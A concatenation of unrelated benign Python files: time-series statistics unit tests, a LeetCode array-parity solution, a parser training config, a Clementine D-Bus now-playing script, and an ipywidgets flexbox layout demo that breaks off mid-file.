    y = np.array(
        [
            0.86074377817203640006,
            0.85316549067906921611,
            0.87104653774363305363,
            0.60692382068987393851,
            0.69225941967301307667,
            0.73336177248909339976,
            0.03661329261479619179,
            0.15693067239962379955,
            0.12777403512447857437,
            -0.27531446294481976,
            -0.24198139631653581283,
            -0.23903317951236391359,
            -0.26000241325906497947,
            -0.21282920015519238288,
            -0.15943768324388354896,
            0.25169301564268781179,
            0.1762305709151877342,
            0.12678133368791388857,
            0.89755829086753169399,
            0.82667068795350151511,
        ]
    )

    with warnings.catch_warnings():
        # catch a hessian inversion and convergence failure warning
        warnings.simplefilter("ignore")
        # Smoke test only: the result is discarded, so the previously
        # unused `res` binding and the redundant function-local
        # `import warnings` (the module already imports it) were removed.
        arma_order_select_ic(y)
def test_acf_fft_dataframe():
    # regression test #322: a single-column DataFrame input must still
    # produce a 1-d result.
    result = acf(
        sunspots.load_pandas().data[["SUNACTIVITY"]], fft=True, nlags=20
    )
    assert_equal(result.ndim, 1)
def test_levinson_durbin_acov():
    # For an AR(1) autocovariance rho**k, Levinson-Durbin must recover
    # the single AR coefficient, innovation variance 1 - rho**2, and a
    # PACF that is zero beyond lag 1.
    rho = 0.9
    m = 20
    acov = rho ** np.arange(200)
    sigma2_eps, ar, pacf, _, _ = levinson_durbin(acov, m, isacov=True)
    assert_allclose(sigma2_eps, 1 - rho ** 2)
    assert_allclose(ar, np.array([rho] + [0] * (m - 1)), atol=1e-8)
    assert_allclose(pacf, np.array([1, rho] + [0] * (m - 1)), atol=1e-8)
@pytest.mark.parametrize("missing", ["conservative", "drop", "raise", "none"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags(acovf_data, adjusted, demean, fft, missing):
    # nlag=10 must return exactly the first 11 values (lags 0..10) of
    # the full autocovariance, for every option combination.
    full = acovf(
        acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
    )
    limited = acovf(
        acovf_data,
        adjusted=adjusted,
        demean=demean,
        fft=fft,
        missing=missing,
        nlag=10,
    )
    assert_allclose(full[:11], limited)
@pytest.mark.parametrize("missing", ["conservative", "drop"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags_missing(acovf_data, adjusted, demean, fft, missing):
    # Same truncation check as test_acovf_nlags, but with NaNs injected
    # so the NaN-tolerant missing policies are exercised.
    acovf_data = acovf_data.copy()
    acovf_data[1:3] = np.nan
    full = acovf(
        acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
    )
    limited = acovf(
        acovf_data,
        adjusted=adjusted,
        demean=demean,
        fft=fft,
        missing=missing,
        nlag=10,
    )
    assert_allclose(full[:11], limited)
def test_acovf_error(acovf_data):
    """Requesting more lags than there are observations raises ValueError."""
    with pytest.raises(ValueError):
        acovf(acovf_data, nlag=250, fft=False)
def test_pacf2acf_ar():
    # For an AR(1) PACF (only lag 1 nonzero), levinson_durbin_pacf must
    # return the geometric ACF 0.9**k and AR coefficients equal to the
    # PACF tail; nlags truncates both outputs.
    pacf = np.zeros(10)
    pacf[0] = 1
    pacf[1] = 0.9
    ar, acf = levinson_durbin_pacf(pacf)
    assert_allclose(acf, 0.9 ** np.arange(10.0))
    assert_allclose(ar, pacf[1:], atol=1e-8)

    ar, acf = levinson_durbin_pacf(pacf, nlags=5)
    assert_allclose(acf, 0.9 ** np.arange(6.0))
    assert_allclose(ar, pacf[1:6], atol=1e-8)
def test_pacf2acf_levinson_durbin():
    # Round-trip: PACF -> (AR, ACF) via levinson_durbin_pacf, then
    # ACF -> (AR, PACF) via levinson_durbin must reproduce the inputs.
    pacf = -(0.9 ** np.arange(11.0))
    pacf[0] = 1
    ar, acf = levinson_durbin_pacf(pacf)
    _, ar_ld, pacf_ld, _, _ = levinson_durbin(acf, 10, isacov=True)
    assert_allclose(ar, ar_ld, atol=1e-8)
    assert_allclose(pacf, pacf_ld, atol=1e-8)

    # From R, FitAR, PacfToAR
    ar_from_r = [
        -4.1609,
        -9.2549,
        -14.4826,
        -17.6505,
        -17.5012,
        -14.2969,
        -9.5020,
        -4.9184,
        -1.7911,
        -0.3486,
    ]
    assert_allclose(ar, ar_from_r, atol=1e-4)
def test_pacf2acf_errors():
    """Invalid PACF inputs to levinson_durbin_pacf raise ValueError."""
    valid = -(0.9 ** np.arange(11.0))
    valid[0] = 1

    # More lags requested than PACF values supplied.
    with pytest.raises(ValueError):
        levinson_durbin_pacf(valid, nlags=20)
    # Missing the leading lag-0 entry.
    with pytest.raises(ValueError):
        levinson_durbin_pacf(valid[1:])
    # Lag-0 value is not 1.
    with pytest.raises(ValueError):
        levinson_durbin_pacf(np.zeros(10))
    # Input is not one-dimensional.
    with pytest.raises(ValueError):
        levinson_durbin_pacf(np.zeros((10, 2)))
def test_pacf_burg():
    # Burg PACF on an MA(1) sample should be close to the Yule-Walker
    # estimate, and the returned sigma2 must be internally consistent
    # with the cumulative product formula.
    rnd = np.random.RandomState(12345)
    e = rnd.randn(10001)
    y = e[1:] + 0.5 * e[:-1]
    pacf, sigma2 = pacf_burg(y, 10)
    yw_pacf = pacf_yw(y, 10)
    assert_allclose(pacf, yw_pacf, atol=5e-4)
    # Internal consistency check between pacf and sigma2
    ye = y - y.mean()
    s2y = ye.dot(ye) / 10000
    pacf[0] = 0
    sigma2_direct = s2y * np.cumprod(1 - pacf ** 2)
    assert_allclose(sigma2, sigma2_direct, atol=1e-3)
def test_pacf_burg_error():
    """pacf_burg rejects 2-d input and nlags exceeding the sample size."""
    # Input must be one-dimensional.
    with pytest.raises(ValueError):
        pacf_burg(np.empty((20, 2)), 10)
    # nlags must not exceed the number of observations.
    with pytest.raises(ValueError):
        pacf_burg(np.empty(100), 101)
def test_innovations_algo_brockwell_davis():
    # Example from Brockwell & Davis for an MA(1): theta converges to
    # the MA coefficient and sigma2 to 1 as nobs grows.
    ma = -0.9
    acovf = np.array([1 + ma ** 2, ma])
    theta, sigma2 = innovations_algo(acovf, nobs=4)
    exp_theta = np.array([[0], [-0.4972], [-0.6606], [-0.7404]])
    assert_allclose(theta, exp_theta, rtol=1e-4)
    assert_allclose(sigma2, [1.81, 1.3625, 1.2155, 1.1436], rtol=1e-4)

    theta, sigma2 = innovations_algo(acovf, nobs=500)
    assert_allclose(theta[-1, 0], ma)
    assert_allclose(sigma2[-1], 1.0)
def test_innovations_algo_rtol():
    # Tightening rtol should not change the converged results.
    ma = np.array([-0.9, 0.5])
    acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
    theta, sigma2 = innovations_algo(acovf, nobs=500)
    theta_2, sigma2_2 = innovations_algo(acovf, nobs=500, rtol=1e-8)
    assert_allclose(theta, theta_2)
    assert_allclose(sigma2, sigma2_2)
def test_innovations_errors():
    # Input validation: nobs must be a positive integer, acov must be
    # 1-d, and rtol must be numeric.
    ma = -0.9
    acovf = np.array([1 + ma ** 2, ma])
    with pytest.raises(TypeError):
        innovations_algo(acovf, nobs=2.2)
    with pytest.raises(ValueError):
        innovations_algo(acovf, nobs=-1)
    with pytest.raises(ValueError):
        innovations_algo(np.empty((2, 2)))
    with pytest.raises(TypeError):
        innovations_algo(acovf, rtol="none")
def test_innovations_filter_brockwell_davis(reset_randomstate):
    # The filtered residuals must satisfy the one-step recursion
    # resid[i] = y[i] - theta[i] * resid[i-1] for an MA(1).
    ma = -0.9
    acovf = np.array([1 + ma ** 2, ma])
    theta, _ = innovations_algo(acovf, nobs=4)
    e = np.random.randn(5)
    endog = e[1:] + ma * e[:-1]
    resid = innovations_filter(endog, theta)
    expected = [endog[0]]
    for i in range(1, 4):
        expected.append(endog[i] - theta[i, 0] * expected[-1])
    expected = np.array(expected)
    assert_allclose(resid, expected)
def test_innovations_filter_pandas(reset_randomstate):
    # Series input must produce the same values as ndarray input and
    # preserve the index on the output.
    ma = np.array([-0.9, 0.5])
    acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
    theta, _ = innovations_algo(acovf, nobs=10)
    endog = np.random.randn(10)
    endog_pd = pd.Series(endog, index=pd.date_range("2000-01-01", periods=10))
    resid = innovations_filter(endog, theta)
    resid_pd = innovations_filter(endog_pd, theta)
    assert_allclose(resid, resid_pd.values)
    assert_index_equal(endog_pd.index, resid_pd.index)
def test_innovations_filter_errors():
    # Input validation: endog must be 1-d, theta must match the sample
    # length, and DataFrame input with the wrong shape is rejected.
    ma = -0.9
    acovf = np.array([1 + ma ** 2, ma])
    theta, _ = innovations_algo(acovf, nobs=4)
    with pytest.raises(ValueError):
        innovations_filter(np.empty((2, 2)), theta)
    with pytest.raises(ValueError):
        innovations_filter(np.empty(4), theta[:-1])
    with pytest.raises(ValueError):
        innovations_filter(pd.DataFrame(np.empty((1, 4))), theta)
def test_innovations_algo_filter_kalman_filter(reset_randomstate):
    # Test the innovations algorithm and filter against the Kalman filter
    # for exact likelihood evaluation of an ARMA process
    ar_params = np.array([0.5])
    ma_params = np.array([0.2])
    # TODO could generalize to sigma2 != 1, if desired, after #5324 is merged
    # and there is a sigma2 argument to arma_acovf
    # (but maybe this is not really necessary for the point of this test)
    sigma2 = 1

    endog = np.random.normal(size=10)

    # Innovations algorithm approach
    acovf = arma_acovf(
        np.r_[1, -ar_params], np.r_[1, ma_params], nobs=len(endog)
    )
    theta, v = innovations_algo(acovf)
    u = innovations_filter(endog, theta)
    # Per-observation Gaussian log-likelihood from the innovations.
    llf_obs = -0.5 * u ** 2 / (sigma2 * v) - 0.5 * np.log(2 * np.pi * v)

    # Kalman filter apparoach
    mod = SARIMAX(endog, order=(len(ar_params), 0, len(ma_params)))
    res = mod.filter(np.r_[ar_params, ma_params, sigma2])

    # Test that the two approaches are identical
    # (looser atol on Windows for platform numeric differences)
    atol = 1e-6 if PLATFORM_WIN else 0.0
    assert_allclose(u, res.forecasts_error[0], rtol=1e-6, atol=atol)
    assert_allclose(
        theta[1:, 0], res.filter_results.kalman_gain[0, 0, :-1], atol=atol
    )
    assert_allclose(llf_obs, res.llf_obs, atol=atol)
def test_adfuller_short_series(reset_randomstate):
    # Very short samples: maxlag is capped, and below the minimum
    # usable length a clear ValueError is raised.
    y = np.random.standard_normal(7)
    res = adfuller(y, store=True)
    assert res[-1].maxlag == 1
    y = np.random.standard_normal(2)
    with pytest.raises(ValueError, match="sample size is too short"):
        adfuller(y)
    y = np.random.standard_normal(3)
    with pytest.raises(ValueError, match="sample size is too short"):
        adfuller(y, regression="ct")
def test_adfuller_maxlag_too_large(reset_randomstate):
    """adfuller raises a clear error when maxlag exceeds what nobs allows."""
    series = np.random.standard_normal(100)
    with pytest.raises(ValueError, match="maxlag must be less than"):
        adfuller(series, maxlag=51)
class SetupZivotAndrews(object):
    # Shared fixture paths for the Zivot-Andrews tests.
    # test directory
    cur_dir = CURR_DIR
    run_dir = os.path.join(cur_dir, "results")
    # use same file for testing failure modes
    fail_file = os.path.join(run_dir, "rgnp.csv")
    fail_mdl = np.asarray(pd.read_csv(fail_file))
class TestZivotAndrews(SetupZivotAndrews):
    # Failure-mode tests followed by comparisons against R's urca.ur.za.

    # failure mode tests
    def test_fail_regression_type(self):
        with pytest.raises(ValueError):
            zivot_andrews(self.fail_mdl, regression="x")

    def test_fail_trim_value(self):
        # trim must be in a valid fraction range.
        with pytest.raises(ValueError):
            zivot_andrews(self.fail_mdl, trim=0.5)

    def test_fail_array_shape(self):
        # Input must be one-dimensional.
        with pytest.raises(ValueError):
            zivot_andrews(np.random.rand(50, 2))

    def test_fail_autolag_type(self):
        with pytest.raises(ValueError):
            zivot_andrews(self.fail_mdl, autolag="None")

    @pytest.mark.parametrize("autolag", ["AIC", "aic", "Aic"])
    def test_autolag_case_sensitivity(self, autolag):
        # autolag matching is case-insensitive.
        res = zivot_andrews(self.fail_mdl, autolag=autolag)
        assert res[3] == 1

    # following tests compare results to R package urca.ur.za (1.13-0)
    def test_rgnp_case(self):
        res = zivot_andrews(
            self.fail_mdl, maxlag=8, regression="c", autolag=None
        )
        assert_allclose(
            [res[0], res[1], res[4]], [-5.57615, 0.00312, 20], rtol=1e-3
        )

    def test_gnpdef_case(self):
        mdlfile = os.path.join(self.run_dir, "gnpdef.csv")
        mdl = np.asarray(pd.read_csv(mdlfile))
        res = zivot_andrews(mdl, maxlag=8, regression="c", autolag="t-stat")
        assert_allclose(
            [res[0], res[1], res[3], res[4]],
            [-4.12155, 0.28024, 5, 40],
            rtol=1e-3,
        )

    def test_stkprc_case(self):
        mdlfile = os.path.join(self.run_dir, "stkprc.csv")
        mdl = np.asarray(pd.read_csv(mdlfile))
        res = zivot_andrews(mdl, maxlag=8, regression="ct", autolag="t-stat")
        assert_allclose(
            [res[0], res[1], res[3], res[4]],
            [-5.60689, 0.00894, 1, 65],
            rtol=1e-3,
        )

    def test_rgnpq_case(self):
        mdlfile = os.path.join(self.run_dir, "rgnpq.csv")
        mdl = np.asarray(pd.read_csv(mdlfile))
        res = zivot_andrews(mdl, maxlag=12, regression="t", autolag="t-stat")
        assert_allclose(
            [res[0], res[1], res[3], res[4]],
            [-3.02761, 0.63993, 12, 102],
            rtol=1e-3,
        )

    def test_rand10000_case(self):
        mdlfile = os.path.join(self.run_dir, "rand10000.csv")
        mdl = np.asarray(pd.read_csv(mdlfile))
        res = zivot_andrews(mdl, regression="c", autolag="t-stat")
        assert_allclose(
            [res[0], res[1], res[3], res[4]],
            [-3.48223, 0.69111, 25, 7071],
            rtol=1e-3,
        )
def test_acf_conservate_nanops(reset_randomstate):
    """acf with missing='conservative' matches a hand-rolled nan-aware ACF."""
    # GH 6729
    series = np.random.standard_normal(100)
    for idx in range(1, series.shape[0]):
        series[idx] += 0.9 * series[idx - 1]
    series[::7] = np.nan

    result = acf(series, missing="conservative", nlags=10, fft=False)

    # Reference computation: demean ignoring NaNs, then nan-aware
    # autocovariances normalized by the lag-0 term.
    centered = series - np.nanmean(series)
    nobs = series.shape[0]
    gamma0 = np.nansum(centered * centered)
    expected = np.ones(11)
    for lag in range(1, 11):
        expected[lag] = np.nansum(centered[lag:] * centered[: nobs - lag]) / gamma0
    assert_allclose(result, expected, rtol=1e-4, atol=1e-4)
def test_pacf_nlags_error(reset_randomstate):
    """pacf rejects a lag count at half the sample size."""
    data = np.random.standard_normal(100)
    with pytest.raises(ValueError, match="Can only compute partial"):
        pacf(data, 50)
def test_coint_auto_tstat():
    """coint with t-stat lag selection on two independent random walks
    should not produce a large test statistic."""
    rs = np.random.RandomState(3733696641)
    lhs = np.cumsum(rs.standard_normal(100))
    rhs = np.cumsum(rs.standard_normal(100))
    res = coint(
        lhs,
        rhs,
        trend="c",
        method="aeg",
        maxlag=0,
        autolag="t-stat",
        return_results=False,
    )
    assert np.abs(res[0]) < 1.65
# Fixtures for the Granger-causality failure tests below: a constant column
# (all zeros or all ones) paired with random data, in both column orders.
rs = np.random.RandomState(1)
a = rs.random_sample(120)
b = np.zeros_like(a)
df1 = pd.DataFrame({"b": b, "a": a})
df2 = pd.DataFrame({"a": a, "b": b})
b = np.ones_like(a)
df3 = pd.DataFrame({"b": b, "a": a})
df4 = pd.DataFrame({"a": a, "b": b})
gc_data_sets = [df1, df2, df3, df4]
@pytest.mark.parametrize("dataset", gc_data_sets)
def test_granger_causality_exceptions(dataset):
    # A constant column makes the test infeasible regardless of column order.
    with pytest.raises(InfeasibleTestError):
        grangercausalitytests(dataset, 4)
|
class Solution:
    def sortArrayByParity(self, A):
        """
        :type A: List[int]
        :rtype: List[int]
        """
        # A stable sort keyed on parity puts all evens first while keeping
        # the original relative order of the evens and of the odds — exactly
        # what the two-comprehension partition produced.
        return sorted(A, key=lambda value: value % 2)
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['say_hello', 'add']
# Cell
def say_hello(to):
"""Say hello to somebody!"""
return f'Hello {to}!'
# Cell
def add(a, b):
    """adding two numbers"""
    total = a + b
    return total
# Author: a101269
# Date: 2020/3/4

# Training / model / dataset configuration for the biaffine dependency parser.
configs = {
    'use_cuda': True,
    'seed': 123,
    'epochs': 30,
    'eval_interval': 500,
    'batch_size': 12,
    # Columns 5 and 9 (feats / misc) can also carry knowledge-base info.
    'columns': [0, 1, 3, 5, 8, 9],
    # {'id': 0, 'word': 1, 'lemma': 2, 'upos': 3, 'xpos': 4, 'feats': 5, 'head': 6, 'deprel': 7, 'deps': 8,'misc': 9}
    'learning_rate': 3e-5,
    'weight_decay': 3.0e-9,  # 0.01,
    'beta1': 0.9,
    'beta2': 0.99,
    # 'eps': 1.0e-12,
    'adam_epsilon': 1e-8,
    'warmup_prop': 8,  # measured in epochs
    'grad_clip_max_norm': 5.0,
    'max_seq_len': 250,  # no sentence is longer than this; safe to ignore for now
    'bert_dim': 768,
    'do_lower_case': True,
    'bert_dropout': 0.1,
    'pretrain_model_path': '../bert_chn',
    'biaffine_hidden_dim': 600,
    'biaffine_dropout': 0.33,
    'use_pos': False,
    'use_knowledge': False,
    'bert_trans_dim': 512,
    'pos_dim': 256,
    'knowledge_dim': 128,
    'use_transformer': True,
    'transformer_layer': 2,
    'transformer_dropout': 0.1,
    'use_lstm': True,
    'lstm_dropout': 0.3,
    'use_gat': False,
    'gat_alpha': 0.01,
    'gat_heads': 6,
    'gat_hidden': 1024,
    'gat_dropout': 0.3,
    'cached_path': 'dataset/cached',
    # BUG FIX: the fine-grained dataset entries below were duplicate dict keys
    # silently shadowed by the coarse entries further down; they are kept as
    # comments (together with the *_ner variants) so the active configuration
    # is unambiguous.  The resulting dict is unchanged.
    # 'dataset_path': 'dataset/',
    # 'relation_vocab_path': 'dataset/vocabs/rel_fine.vocab',
    # 'train_file': 'dataset/sdp_mix_train.conllu_bio',
    # 'dev_file': 'dataset/sdp_text_dev.conllu_bio',
    # 'test_file1': 'dataset/sdp_text_test.conllu_bio',
    # 'test_file2': 'dataset/sdp_news_test.conllu_bio',
    # 'train_file': 'dataset/sdp_mix_train.conllu_ner',
    # 'dev_file': 'dataset/sdp_text_dev.conllu_ner',
    # 'test_file1': 'dataset/sdp_text_test.conllu_ner',
    # 'test_file2': 'dataset/sdp_news_test.conllu_ner',
    'dataset_path': 'dataset/coarse',
    'relation_vocab_path': 'dataset/vocabs/rel_coarse.vocab',
    'train_file': 'dataset/coarse/coarse_mix.train.conllu',
    'dev_file': 'dataset/coarse/coarse_text.dev.conllu',
    'test_file1': 'dataset/coarse/coarse_text.test.conllu',
    'test_file2': 'dataset/coarse/coarse_news.test.conllu',
    'test_file3': 'dataset/coarse/coarse_yqy.test.conllu',
    'test_file4': 'dataset/coarse/coarse_dram.test.conllu',
    'eval_temp_file': 'dataset/eval_temp.conllu',
    'debug_file': 'dataset/test.conllu_ner',
    'pos_vocab_path': 'dataset/vocabs/pos.vocab',
    'bio_vocab_path': 'dataset/vocabs/bio.vocab',
    'knowledge_vocab_path': 'dataset/vocabs/knowledge.vocab',
    'logger_name': 'mylog',
    'output_path': 'output',
    'saved_model_path': 'output/saved_model',
}
|
#!/usr/bin/python
from dbus import Bus, DBusException
# Session bus shared by every helper in this script.
bus = Bus(Bus.TYPE_SESSION)


def get_clem():
    """Return Clementine's MPRIS /Player object, or None when unavailable."""
    try:
        return bus.get_object('org.mpris.clementine', '/Player')
    except DBusException:
        # Either Clementine is not running or the D-Bus setup is broken.
        return None
def command_np():
    """Return a now-playing string ("Artist - Title"), or "?" when
    Clementine is not reachable over D-Bus.
    """
    clem = get_clem()
    if clem:
        # BUG FIX: the old code queried the bus and called GetMetadata()
        # *before* the None-check, so the "?" fallback was unreachable and a
        # closed Clementine crashed the script with an uncaught DBusException.
        # (The unused PositionGet() query was dropped as well.)
        metadata = clem.GetMetadata()
        return metadata['artist'] + " - " + metadata['title']
    return "?"


print(command_np())
|
__all__ = ['layout']

import ipywidgets as widgets

# Layout shared by every demo button; flex_wrap lets the buttons reflow when
# the enclosing box shrinks.
item_layout = widgets.Layout(height='80px', min_width='30px', min_height='50px',
                             width='60px', flex_wrap='wrap')

button_styles = ['primary',
                 'success',
                 'info',
                 'warning',
                 'danger']

# One button per style so layout changes are easy to see.
items = [widgets.Button(layout=item_layout, description=str(i), button_style=button_styles[i]) for i in range(5)]

# ### Create box to hold the layout demo widgets
#
# The widget displayed below will be embedded in a larger widget later in the
# notebook. That larger widget lets you interactively change the layout of
# this widget.

# In[ ]:

box_layout = widgets.Layout(overflow_x='scroll',
                            border='3px solid black',
                            width='700px',
                            min_width='50px',
                            max_width='1000px',
                            min_height='50px',
                            max_height='1000px',
                            height='300px',
                            flex_direction='row',
                            display='flex')

# The demo box whose layout all of the controls below mutate in place.
widgetGroup = widgets.Box(children=items, layout=box_layout)
widgetGroupAndTitle = widgets.VBox([widgets.Label('Widget area:'), widgetGroup],
                                   layout=widgets.Layout(height='500px', width='700px'))
widgetGroupAndTitle
# ## Construct widget with controls for changing layout

# ### Create a text area widget where the Python code to reproduce the CSS
# programmatically is shown.

# In[ ]:

# Read-back panel: every observer below mirrors the current layout into this
# text area as Python code.
pythonCode = widgets.Textarea(
    value='',
    placeholder='Python code is exported to this panel....',
    description='',
    disabled=False
)
pythonCode.layout.width = '80%'
pythonCode.layout.height = '80px'
# ### Create drop downs for choices of `overflow` in `x` and `y`

# In[ ]:

# Set a uniform description width to make alignment easier
style = {'description_width': '100px'}

# Define one of two lists that will hold controls for changing the layout
vboxList = []

# Widget to present overflow style options for x
overflow_x = widgets.Dropdown(
    options=['scroll', 'hidden', 'auto', 'visible', 'initial', 'inherit'],
    value=widgetGroup.layout.overflow_x,
    description='overflow_x:',
    disabled=False,
    style=style,
)

# Add the dropdown to the column of style controls.
vboxList.append(overflow_x)

# Set up observer to watch for changes in selected overflow style and apply
# selected style to widgetGroup.
def on_overflow_xchange(change):
    # Only react to actual value changes (observe() fires for other events too).
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.overflow_x = change.new
        # Note how easy it is to get the Python code to generate the layout!
        pythonCode.value = str(widgetGroup.layout)

overflow_x.observe(on_overflow_xchange)

# Widget to present overflow style options for y
overflow_y = widgets.Dropdown(
    options=['scroll', 'hidden', 'auto', 'visible', 'initial', 'inherit'],
    # NOTE(review): hard-coded 'scroll' rather than reading the current layout
    # like overflow_x does — box_layout above only sets overflow_x.
    value='scroll',
    description='overflow_y:',
    disabled=False,
    style=style,
)
vboxList.append(overflow_y)

def on_overflow_y_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.overflow_y = change.new
        pythonCode.value = str(widgetGroup.layout)

overflow_y.observe(on_overflow_y_change)

# ### Add some choices for the border around our layout demo

# In[ ]:

border = widgets.Dropdown(
    options=['3px solid black', '1px dashed black', '2px solid black', '3px solid blue', ],
    value=widgetGroup.layout.border,
    description='border:',
    disabled=False,
    style=style,
)
vboxList.append(border)

def on_border_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.border = change.new
        pythonCode.value = str(widgetGroup.layout)

border.observe(on_border_change)
# ## Add dropdowns for several CSS layout options

# In[ ]:

# flex-flow options
flex_flow = widgets.Dropdown(
    options=[
        'column-reverse',
        'column',
        'row',
        'row-reverse',
    ],
    value='row',
    description='flex-flow:',
    disabled=False,
    style=style,
)
vboxList.append(flex_flow)

def on_flex_flow_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.flex_flow = change.new
        pythonCode.value = str(widgetGroup.layout)

flex_flow.observe(on_flex_flow_change)

# flex-direction options
flex_direction = widgets.Dropdown(
    options=[
        'column-reverse',
        'column',
        'row',
        'row-reverse',
    ],
    value='row',
    description='flex-direction:',
    disabled=False,
    style=style,
)
vboxList.append(flex_direction)

def on_flex_direction_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.flex_direction = change.new
        pythonCode.value = str(widgetGroup.layout)

flex_direction.observe(on_flex_direction_change)

# display options
# NOTE(review): this module-level name shadows the builtin/IPython `display`.
display = widgets.Dropdown(
    options=['flex', 'inline-flex'],
    value='flex',
    description='display:',
    disabled=False,
    style=style,
)
vboxList.append(display)

def on_display_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.display = change.new
        pythonCode.value = str(widgetGroup.layout)

display.observe(on_display_change)

# flex-wrap options
flex_wrap = widgets.Dropdown(
    options=[
        'nowrap',
        'wrap',
        'wrap-reverse',
    ],
    value='nowrap',
    description='flex-wrap:',
    disabled=False,
    style=style,
)
vboxList.append(flex_wrap)

def on_flex_wrap_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.flex_wrap = change.new
        pythonCode.value = str(widgetGroup.layout)

flex_wrap.observe(on_flex_wrap_change)
# justify-content options
justify_content = widgets.Dropdown(
    options=[
        'flex-start',
        'flex-end',
        'center',
        'space-between',
        'space-around',
    ],
    value='flex-start',
    description='justify_content:',
    disabled=False,
    style=style,
)
vboxList.append(justify_content)

def on_justify_content_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.justify_content = change.new
        pythonCode.value = str(widgetGroup.layout)

justify_content.observe(on_justify_content_change)

# align-items options
align_items = widgets.Dropdown(
    options=[
        'flex-start',
        'flex-end',
        'center',
        'baseline',
        'stretch',
    ],
    value='stretch',
    description='align_items:',
    disabled=False,
    style=style,
)
vboxList.append(align_items)

def on_align_items_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.align_items = change.new
        pythonCode.value = str(widgetGroup.layout)

align_items.observe(on_align_items_change)

# align-content options
align_content = widgets.Dropdown(
    options=[
        'flex-start',
        'flex-end',
        'center',
        'space-between',
        'space-around',
        'space-evenly',
        'stretch',
        'inherit',
        'initial',
        'unset'],
    value='stretch',
    description='align_content:',
    disabled=False,
    style=style,
)
vboxList.append(align_content)

def on_align_content_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.align_content = change.new
        pythonCode.value = str(widgetGroup.layout)

align_content.observe(on_align_content_change)
# ### Set up `VBox` for holding these controls

# In[ ]:

vbox_style_options = widgets.VBox(vboxList)

# ## Set up controls for changing sizes of layout demo

# In[ ]:

# These controls will be grouped together in one VBox. Items added to the list
# below will be placed in that VBox
vboxwidgetSizeList = []

# Width of the px/% toggle buttons used by every size control below.
sizeButtonWidth = '40px'
# NOTE(review): buttonLayout is defined but never used below — presumably a
# leftover; confirm before removing.
buttonLayout = widgets.Layout(width=sizeButtonWidth)
# Button/slider combination for adjusting width
width_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
width_px_percent.style.button_width = sizeButtonWidth

width = widgets.IntSlider(
    # Start from the current layout value with the unit suffix stripped.
    value=int(widgetGroup.layout.width.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='width:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_width_change(change):
    # Apply slider value plus the currently selected unit to the demo box.
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.width = str(change.new) + width_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

width.observe(on_width_change)
vboxwidgetSizeList.append(widgets.HBox([width, width_px_percent]))

def on_width_px_percent_change(change):
    # Unit toggled: re-apply the current slider value with the new unit.
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.width = str(width.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

width_px_percent.observe(on_width_px_percent_change)

# In[ ]:

# Same as above, but for height
height = widgets.IntSlider(
    value=int(widgetGroup.layout.height.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='height:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_height_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.height = str(change.new) + height_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

height.observe(on_height_change)

height_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
height_px_percent.style.button_width = sizeButtonWidth  # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([height, height_px_percent]))

def on_height_px_percent_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.height = str(height.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

height_px_percent.observe(on_height_px_percent_change)
# In[ ]:

# Slider/buttons for min-width
min_width = widgets.IntSlider(
    value=int(widgetGroup.layout.min_width.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='min_width:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_min_width_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.min_width = str(change.new) + min_width_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

min_width.observe(on_min_width_change)

min_width_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
min_width_px_percent.style.button_width = sizeButtonWidth  # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([min_width, min_width_px_percent]))

def on_min_width_px_percent_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.min_width = str(min_width.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

